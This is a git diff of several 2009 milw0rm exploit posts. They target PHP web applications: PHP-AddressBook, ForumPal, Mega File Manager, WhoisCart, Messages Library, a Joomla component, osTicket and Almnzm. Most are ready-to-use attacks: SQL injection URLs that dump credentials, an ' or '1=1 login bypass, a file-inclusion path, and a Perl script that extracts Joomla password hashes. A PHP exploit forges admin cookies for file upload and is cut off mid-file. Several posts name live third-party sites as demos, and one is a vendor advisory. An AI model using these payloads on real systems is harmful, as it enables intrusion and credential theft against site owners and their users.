@@ -1,131 +1,131 @@ -*********************************************************************************************** -*********************************************************************************************** -** ** -** ** -** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** -** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** -** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** -** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ -**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- -** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ - [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** -** ** -** ** -** VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O ** -** PROUD TO BE SPANISH! ** -** ** -*********************************************************************************************** -*********************************************************************************************** - ----------------------------------------------------------------------------------------------- -| MULTIPLE SQL INJECTION VULNERABILITIES | -|--------------------------------------------------------------------------------------------| -| | PHP-AddressBook v-4.0.X | | -| CMS INFORMATION: ---------------------------------- | -| | -|-->WEB: http://sourceforge.net/projects/php-addressbook/ | -|-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/ | -|-->DEMO: http://php-addressbook.sourceforge.net/demo/ | -|-->CATEGORY: Address Book | -|-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer. | -| Manage groups, addresses, e-Mails, phone numbers & birthdays... 
| -|-->RELEASED: 2009-06-13 | -| | -| CMS VULNERABILITY: | -| | -|-->TESTED ON: firefox 3 | -|-->DORK: "php-addressbook" | -|-->CATEGORY: SQL INJECTION | -|-->AFFECT VERSION: 4.0.X | -|-->Discovered Bug date: 2009-06-16 | -|-->Reported Bug date: 2009-06-16 | -|-->Fixed bug date: N/A | -|-->Info patch (????): N/A | -|-->Author: YEnH4ckEr | -|-->mail: y3nh4ck3r[at]gmail[dot]com | -|-->WEB/BLOG: N/A | -|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | -|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | ----------------------------------------------------------------------------------------------- - - - -Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest). - - - -##################### -//////////////////// - -SQL INJECTION VULN: - -//////////////////// -##################### - - - ------------ -EXPLOITS: ------------ - - - -<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> - - - - -[++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23 - - - - -[++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 - - - - -[++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23 - - - -<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> - - - - - -[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 - - - - -------------- -WATCH VIDEO: -------------- - - - -SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo - - - - -<<<-----------------------------EOF---------------------------------->>>ENJOY IT! 
- - - - -############################################################################## -############################################################################## -##**************************************************************************## -## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## -##**************************************************************************## -##--------------------------------------------------------------------------## -##**************************************************************************## -## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## -##**************************************************************************## -############################################################################## -############################################################################## - -# milw0rm.com [2009-06-26] +*********************************************************************************************** +*********************************************************************************************** +** ** +** ** +** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** +** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** +** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** +** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ +**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- +** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ + [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** +** ** +** ** +** VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O ** +** PROUD TO BE SPANISH! 
** +** ** +*********************************************************************************************** +*********************************************************************************************** + +---------------------------------------------------------------------------------------------- +| MULTIPLE SQL INJECTION VULNERABILITIES | +|--------------------------------------------------------------------------------------------| +| | PHP-AddressBook v-4.0.X | | +| CMS INFORMATION: ---------------------------------- | +| | +|-->WEB: http://sourceforge.net/projects/php-addressbook/ | +|-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/ | +|-->DEMO: http://php-addressbook.sourceforge.net/demo/ | +|-->CATEGORY: Address Book | +|-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer. | +| Manage groups, addresses, e-Mails, phone numbers & birthdays... | +|-->RELEASED: 2009-06-13 | +| | +| CMS VULNERABILITY: | +| | +|-->TESTED ON: firefox 3 | +|-->DORK: "php-addressbook" | +|-->CATEGORY: SQL INJECTION | +|-->AFFECT VERSION: 4.0.X | +|-->Discovered Bug date: 2009-06-16 | +|-->Reported Bug date: 2009-06-16 | +|-->Fixed bug date: N/A | +|-->Info patch (????): N/A | +|-->Author: YEnH4ckEr | +|-->mail: y3nh4ck3r[at]gmail[dot]com | +|-->WEB/BLOG: N/A | +|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | +|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | +---------------------------------------------------------------------------------------------- + + + +Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest). 
+ + + +##################### +//////////////////// + +SQL INJECTION VULN: + +//////////////////// +##################### + + + +----------- +EXPLOITS: +----------- + + + +<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> + + + + +[++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23 + + + + +[++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 + + + + +[++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23 + + + +<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> + + + + + +[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23 + + + + +------------- +WATCH VIDEO: +------------- + + + +SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo + + + + +<<<-----------------------------EOF---------------------------------->>>ENJOY IT! + + + + +############################################################################## +############################################################################## +##**************************************************************************## +## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## +##**************************************************************************## +##--------------------------------------------------------------------------## +##**************************************************************************## +## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## +##**************************************************************************## +############################################################################## +############################################################################## + +# milw0rm.com [2009-06-26] 
diff --git a/platforms/php/webapps/9024.txt b/platforms/php/webapps/9024.txt index 7e6c78e8c..f6f5d3240 100755 --- a/platforms/php/webapps/9024.txt +++ b/platforms/php/webapps/9024.txt @@ -1,24 +1,24 @@ --------------------------------------------------------------- -ForumPal v1.5( Auth Bypass) SQL Injection Vulnerability ---------------------------------------------------------------- -Founder :ThE g0bL!N -Home:http://www.datachecknh.com -Software :ForumPal v1.5 -Note: Je m'appel Tecktonik ---------------------------------------------------------------- -Exploit1: -------- -Username: [Real_name_admin] -Password:' or '1=1 ----------------------------------------------------------------- -Dem0 ----- -http://www.datachecknh.com/forumpal_FE_Demo/login.asp -EXPLOIT fOR DEMO -Username: admin -Password:' or '1=1 --------------------------------------- -His0k4 - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r. ------------------------------------------------------------------ - -# milw0rm.com [2009-06-26] +-------------------------------------------------------------- +ForumPal v1.5( Auth Bypass) SQL Injection Vulnerability +--------------------------------------------------------------- +Founder :ThE g0bL!N +Home:http://www.datachecknh.com +Software :ForumPal v1.5 +Note: Je m'appel Tecktonik +--------------------------------------------------------------- +Exploit1: +------- +Username: [Real_name_admin] +Password:' or '1=1 +---------------------------------------------------------------- +Dem0 +---- +http://www.datachecknh.com/forumpal_FE_Demo/login.asp +EXPLOIT fOR DEMO +Username: admin +Password:' or '1=1 +-------------------------------------- +His0k4 - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r. +----------------------------------------------------------------- + +# milw0rm.com [2009-06-26] diff --git a/platforms/php/webapps/9025.txt b/platforms/php/webapps/9025.txt index e10a0951d..820d1a7ef 100755 --- a/platforms/php/webapps/9025.txt 
+++ b/platforms/php/webapps/9025.txt @@ -1,18 +1,18 @@ -################################################################################################################# -[+] Mega File Manager 1.0 (index.php page) Local File Inclusion Vulnerability -[+] Discovered By SirGod -[+] http://insecurity-ro.org -################################################################################################################# - -[+] Homepage : http://www.awesomephp.com/?MegaFileManager - -[+] Note : The script is full of SQL Injection vulns,but I am tired to -make querys now. - -[+] Local File Inclusion - - http://127.0.0.1/[path]/index.php?page=../../../../../../BOOTSECT.BAK%00 - -################################################################################################################# - -# milw0rm.com [2009-06-26] +################################################################################################################# +[+] Mega File Manager 1.0 (index.php page) Local File Inclusion Vulnerability +[+] Discovered By SirGod +[+] http://insecurity-ro.org +################################################################################################################# + +[+] Homepage : http://www.awesomephp.com/?MegaFileManager + +[+] Note : The script is full of SQL Injection vulns,but I am tired to +make querys now. + +[+] Local File Inclusion + + http://127.0.0.1/[path]/index.php?page=../../../../../../BOOTSECT.BAK%00 + +################################################################################################################# + +# milw0rm.com [2009-06-26] diff --git a/platforms/php/webapps/9026.txt b/platforms/php/webapps/9026.txt index f7526db43..0255da4a8 100755 --- a/platforms/php/webapps/9026.txt +++ b/platforms/php/webapps/9026.txt 
@@ -1,52 +1,52 @@ -+===================================================================================+ - ./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _ - / /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ / - \ \_ _ _ _/ /___ / / __ | |) / | | / / - \_ _ _ _/ /___ / / | __ || / | | / / - _______\ \_ _ \ \2_0_0_9 | \ | | / /____ - /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ -+===================================================================================+ -| | -| | -| WHOISCART ADMIN BYPASS | -| | -+===================================================================================+ -| | -| Author.: Black Dream | -| Contact: Be5_at_HoTMail_dot_Fr | -| HoMe : www.sec-r1z.com | -| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM | -+===================================================================================+ -| | -| Script.: WHOISCART | -| Home...: http://whoiscart.net | -| | -+-----------------------------------------------------------------------------------+ -| | -| Exploit: | -| | -| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm | -| | -| [+] Demo | -| | -| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm | -| | -| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm | -| | -| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm | -| | -| | -| | -| [+] Now you see all cpanel[s] accout[pwd] xD Pure admin | -| | -| [+] Enjoy xD | -+-----------------------------------------------------------------------------------| - -+===================================================================================+ -| | -| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0 | -| And All #sec-r1z memb3rz!!!! 
| -+===================================================================================+ -E0D|F - -# milw0rm.com [2009-06-29] ++===================================================================================+ + ./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _ + / /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ / + \ \_ _ _ _/ /___ / / __ | |) / | | / / + \_ _ _ _/ /___ / / | __ || / | | / / + _______\ \_ _ \ \2_0_0_9 | \ | | / /____ + /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ ++===================================================================================+ +| | +| | +| WHOISCART ADMIN BYPASS | +| | ++===================================================================================+ +| | +| Author.: Black Dream | +| Contact: Be5_at_HoTMail_dot_Fr | +| HoMe : www.sec-r1z.com | +| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM | ++===================================================================================+ +| | +| Script.: WHOISCART | +| Home...: http://whoiscart.net | +| | ++-----------------------------------------------------------------------------------+ +| | +| Exploit: | +| | +| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm | +| | +| [+] Demo | +| | +| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm | +| | +| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm | +| | +| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm | +| | +| | +| | +| [+] Now you see all cpanel[s] accout[pwd] xD Pure admin | +| | +| [+] Enjoy xD | ++-----------------------------------------------------------------------------------| + ++===================================================================================+ +| | +| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0 | +| And All #sec-r1z memb3rz!!!! 
| ++===================================================================================+ +E0D|F + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9027.txt b/platforms/php/webapps/9027.txt index 562337990..7fc323bb2 100755 --- a/platforms/php/webapps/9027.txt +++ b/platforms/php/webapps/9027.txt 
@@ -1,44 +1,44 @@ -+===================================================================================+ - ./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _ - / /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ / - \ \_ _ _ _/ /___ / / __ | |) / | | / / - \_ _ _ _/ /___ / / | __ || / | | / / - _______\ \_ _ \ \2_0_0_9 | \ | | / /____ - /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ -+===================================================================================+ -| | -| | -| Messages Library v2.0 Cat.php SQL Injection Vulnerabilities | -| | -+===================================================================================+ -| | -| Author.: Black Dream | -| Contact: Be5_at_HoTMail_dot_Fr | -| HoMe : www.sec-r1z.com | -| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM | -+===================================================================================+ -| | -| Script.: http://www.traidnt.net/vb/showthread.php?t=31814 | -|Donwload: http://www.traidnt.net/vb/attachment.php?attachmentid=16341&d=1126191996 | -| | -+-----------------------------------------------------------------------------------+ -| -| Exploit: -| -| http://[website]/[script]/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor -| -| [+] Demo -| -| -| http://www.m3la.com/sms/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor -| -+-----------------------------------------------------------------------------------+ - -+===================================================================================+ -| | -| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0 | -| And All #sec-r1z memb3rz!!!! 
| -+===================================================================================+ -E0D|F - -# milw0rm.com [2009-06-29] ++===================================================================================+ + ./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _ + / /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ / + \ \_ _ _ _/ /___ / / __ | |) / | | / / + \_ _ _ _/ /___ / / | __ || / | | / / + _______\ \_ _ \ \2_0_0_9 | \ | | / /____ + /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ ++===================================================================================+ +| | +| | +| Messages Library v2.0 Cat.php SQL Injection Vulnerabilities | +| | ++===================================================================================+ +| | +| Author.: Black Dream | +| Contact: Be5_at_HoTMail_dot_Fr | +| HoMe : www.sec-r1z.com | +| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM | ++===================================================================================+ +| | +| Script.: http://www.traidnt.net/vb/showthread.php?t=31814 | +|Donwload: http://www.traidnt.net/vb/attachment.php?attachmentid=16341&d=1126191996 | +| | ++-----------------------------------------------------------------------------------+ +| +| Exploit: +| +| http://[website]/[script]/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor +| +| [+] Demo +| +| +| http://www.m3la.com/sms/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor +| ++-----------------------------------------------------------------------------------+ + ++===================================================================================+ +| | +| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0 | +| And All #sec-r1z memb3rz!!!! | ++===================================================================================+ +E0D|F + +# milw0rm.com [2009-06-29] 
diff --git a/platforms/php/webapps/9028.txt b/platforms/php/webapps/9028.txt index 239feb0c7..445dfd24f 100755 --- a/platforms/php/webapps/9028.txt +++ b/platforms/php/webapps/9028.txt 
@@ -1,118 +1,118 @@ - ------------------------------------------------------------------------------- -Joomla Component com_php (id) Blind SQL-injection Vulnerability ------------------------------------------------------------------------------- - - - ##################################################### - # [+] Author : Chip D3 Bi0s # - # [+] Email : chipdebios[alt+64]gmail.com # - # [+] Vulnerability : Blind SQL injection # - # [+] Group : LatinHackTeam # - ##################################################### - -********************************************************************** - Info Cms: - * @name : PHP Component - * @author : gabe@fijiwebdesign.com - * @copyright : (c) fijiwebdesign.com - * @license : http://www.fijiwebdesign.com/ - * @dowloand : http://code.google.com/p/joomla-php/downloads/list -********************************************************************** - -Example: -http://localHost/path/index.php?option=com_php&Itemid=x&id=y<Sql Code> - -x = number Itemid valid -y = number id valid - -<Sql code>: - -table jos_users: -+and+(select+1+from+jos_users+limit+0,1)=1 - -column password: -+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1 - -column username: -+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 - -caracter ascii -+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))>57 - -etc, etc... 
- -DEMO LIVE: - -http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=1 -true - -http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=2 -else - -http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=58 -else - -http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=57 -true - -note : in http://www.mercadominas.com.br -x = number Itemid valid : 70 -y = number id valid : 131 - -Date and 1=1 & not and 1=2 : com_search --->use script - -etc, etc.... - -+++++++++++++++++++++++++++++++++++++++ -#[!] Produced in South America -+++++++++++++++++++++++++++++++++++++++ - -if you want to save the work, you can use the following script, -gives you password, you are free to modify it ;) --------------------------------------------------------------------- - -#!/usr/bin/perl -w -use LWP::UserAgent; -print "\t\t-------------------------------------------------------------\n\n"; -print "\t\t | Chip d3 Bi0s | \n\n"; -print "\t\t Joomla Component com_php (id) Blind SQL-injection \n\n"; -print "\t\t-------------------------------------------------------------\n\n"; -print "[-] http://wwww.host.org/Path: "; -chomp(my $target=<STDIN>); -print "[-] Introduce Itemid: "; -chomp($itemid=<STDIN>); -print "[-] Introduce id: "; -chomp($id=<STDIN>); -print "[-] Dato para and 1=1 & no para and 1=2 : "; -chomp($z=<STDIN>); - -print "[+] Password: "; -$column_name="concat(password)"; -$table_name="jos_users"; -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - - -for ($x=1;$x<=32;$x++) -{ - for ($c=48;$c<=57;$c++) -{ - $host = $target . 
"/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c; - - my $res = $b->request(HTTP::Request->new(GET=>$host)); - my $content = $res->content; - my $regexp = $z; - if ($content =~ /$regexp/) {$char=chr($c); print "$char";} - } -for ($c=97;$c<=102;$c++) -{ - $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c; - my $res = $b->request(HTTP::Request->new(GET=>$host)); - my $content = $res->content; - my $regexp = $z; - if ($content =~ /$regexp/) {$char=chr($c); print "$char";} - } -} - -# milw0rm.com [2009-06-29] + +------------------------------------------------------------------------------ +Joomla Component com_php (id) Blind SQL-injection Vulnerability +------------------------------------------------------------------------------ + + + ##################################################### + # [+] Author : Chip D3 Bi0s # + # [+] Email : chipdebios[alt+64]gmail.com # + # [+] Vulnerability : Blind SQL injection # + # [+] Group : LatinHackTeam # + ##################################################### + +********************************************************************** + Info Cms: + * @name : PHP Component + * @author : gabe@fijiwebdesign.com + * @copyright : (c) fijiwebdesign.com + * @license : http://www.fijiwebdesign.com/ + * @dowloand : http://code.google.com/p/joomla-php/downloads/list +********************************************************************** + +Example: +http://localHost/path/index.php?option=com_php&Itemid=x&id=y<Sql Code> + +x = number Itemid valid +y = number id valid + +<Sql code>: + +table jos_users: ++and+(select+1+from+jos_users+limit+0,1)=1 + +column password: ++and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1 + +column username: 
++and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 + +caracter ascii ++and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))>57 + +etc, etc... + +DEMO LIVE: + +http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=1 +true + +http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=2 +else + +http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=58 +else + +http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=57 +true + +note : in http://www.mercadominas.com.br +x = number Itemid valid : 70 +y = number id valid : 131 + +Date and 1=1 & not and 1=2 : com_search --->use script + +etc, etc.... + ++++++++++++++++++++++++++++++++++++++++ +#[!] Produced in South America ++++++++++++++++++++++++++++++++++++++++ + +if you want to save the work, you can use the following script, +gives you password, you are free to modify it ;) +-------------------------------------------------------------------- + +#!/usr/bin/perl -w +use LWP::UserAgent; +print "\t\t-------------------------------------------------------------\n\n"; +print "\t\t | Chip d3 Bi0s | \n\n"; +print "\t\t Joomla Component com_php (id) Blind SQL-injection \n\n"; +print "\t\t-------------------------------------------------------------\n\n"; +print "[-] http://wwww.host.org/Path: "; +chomp(my $target=<STDIN>); +print "[-] Introduce Itemid: "; +chomp($itemid=<STDIN>); +print "[-] Introduce id: "; +chomp($id=<STDIN>); +print "[-] Dato para and 1=1 & no para and 1=2 : "; +chomp($z=<STDIN>); + +print "[+] Password: "; +$column_name="concat(password)"; +$table_name="jos_users"; +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); + + +for ($x=1;$x<=32;$x++) 
+{ + for ($c=48;$c<=57;$c++) +{ + $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c; + + my $res = $b->request(HTTP::Request->new(GET=>$host)); + my $content = $res->content; + my $regexp = $z; + if ($content =~ /$regexp/) {$char=chr($c); print "$char";} + } +for ($c=97;$c<=102;$c++) +{ + $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c; + my $res = $b->request(HTTP::Request->new(GET=>$host)); + my $content = $res->content; + my $regexp = $z; + if ($content =~ /$regexp/) {$char=chr($c); print "$char";} + } +} + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9032.txt b/platforms/php/webapps/9032.txt index 589e5da9d..f8ec1dbf0 100755 --- a/platforms/php/webapps/9032.txt +++ b/platforms/php/webapps/9032.txt 
@@ -1,38 +1,38 @@ -nGenuity Information Services - Security Advisory - - Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection - Application: osTicket v1.6 RC4 - Vendor: osTicket -Vendor website: http://www.osticket.com - Author: Adam Baldwin (adam_baldwin@ngenuity-is.com) - - I. BACKGROUND - "osTicket is a widely-used open source support ticket system. It seamlessly - integrates inquiries created via email and web-based forms into a simple - easy to use multi-user web interface. Easily manage, organize and archive - all your support requests and responses in one place while providing your - clients with accountability and responsiveness they deserve." [1] - - II. DETAILS - osTicket prior to v1.6 RC5 fails to validate / escape staff usernames which - can be abused to execute a blind sql injection attack by an unauthenticated - attacker. - - The vendor has provided a new release v1.6 RC5 which addresses this vulnerability. - They have also provided patching instructions [2] should you be unable to perform - a full upgrade at this time. - - One sample attack string might look similar to the following: - '+(SELECT IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd - FROM ost_staff where staff_id=1) and '1'='1 - - III. REFERENCES - [1] - http://www.osticket.com - [2] - http://osticket.com/forums/project.php?issueid=118 - - IV. VENDOR COMMUNICATION - 3.25.2009 - Vulnerability Discovery - 3.25.2009 - Vendor notification & initial vendor response - 6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 - -# milw0rm.com [2009-06-29] +nGenuity Information Services - Security Advisory + + Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection + Application: osTicket v1.6 RC4 + Vendor: osTicket +Vendor website: http://www.osticket.com + Author: Adam Baldwin (adam_baldwin@ngenuity-is.com) + + I. BACKGROUND + "osTicket is a widely-used open source support ticket system. 
It seamlessly + integrates inquiries created via email and web-based forms into a simple + easy to use multi-user web interface. Easily manage, organize and archive + all your support requests and responses in one place while providing your + clients with accountability and responsiveness they deserve." [1] + + II. DETAILS + osTicket prior to v1.6 RC5 fails to validate / escape staff usernames which + can be abused to execute a blind sql injection attack by an unauthenticated + attacker. + + The vendor has provided a new release v1.6 RC5 which addresses this vulnerability. + They have also provided patching instructions [2] should you be unable to perform + a full upgrade at this time. + + One sample attack string might look similar to the following: + '+(SELECT IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd + FROM ost_staff where staff_id=1) and '1'='1 + + III. REFERENCES + [1] - http://www.osticket.com + [2] - http://osticket.com/forums/project.php?issueid=118 + + IV. VENDOR COMMUNICATION + 3.25.2009 - Vulnerability Discovery + 3.25.2009 - Vendor notification & initial vendor response + 6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 + +# milw0rm.com [2009-06-29] diff --git a/platforms/php/webapps/9035.txt b/platforms/php/webapps/9035.txt index 56e20af4c..f06ba7353 100755 --- a/platforms/php/webapps/9035.txt +++ b/platforms/php/webapps/9035.txt 
@@ -1,88 +1,88 @@ -<? -print_r(' - || || | || - o_,_7 _|| . _o_7 _|| q_|_|| o_///_, - ( : / (_) / ( . - - ___________________ - _/QQQQQQQQQQQQQQQQQQQ\__ ----Script Almnzm SQL INJECTION __/QQQ/````````````````\QQQ\___ - _/QQQQQ/ \QQQQQQ\ ----"Powered by Almnzm" /QQQQ/`` ```QQQQ\ - /QQQQ/ \QQQQ\ ----admin cookie create |QQQQ/ By Qabandi \QQQQ| ----Add PhP Ext |QQQQ| |QQQQ| ----Upload php in adminCP |QQQQ| From Kuwait, PEACE... |QQQQ| - |QQQQ| |QQQQ| - |QQQQ\ iqa[a]hotmail.fr /QQQQ| - \QQQQ\ __ /QQQQ/ - \QQQQ\ /QQ\_QQQQ/ - \QQQQ\ \QQQQQQQ/ - \QQQQQ\ /QQQQQ/_ - ``\QQQQQ\_____________/QQQ/\QQQQ\_ - ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ -'); - -if ($argc<3) { -print_r(' ------------------------------------------------------------------------------ -Usage: php '.$argv[0].' localhost /mnzm/ ------------------------------------------------------------------------------ -'); -die; -} -$host = $argv[1]; -$p = "http://".$host.$argv[2]; - - function QAB_GET($qabandi, $from){ -$content = $from; -preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/", - $content, - $out, PREG_PATTERN_ORDER); - -return $out[1][0]; - } - - - - $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n"; - $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; - $packet.="Pragma: no-cache\r\n"; - $packet.="Cookie: customer=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".";\r\n"; - $packet.="Connection: Close\r\n\r\n"; - $o = @fsockopen($host, 80); - if(!$o){ - echo "\n[x] No response...\n"; - die; - } - - fputs($o, $packet); - while (!feof($o)) $data .= fread($o, 1024); - fclose($o); - - $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); - if ( !empty($_404) ){ - echo "\n[x] 404 Not Found... Make sure of path. 
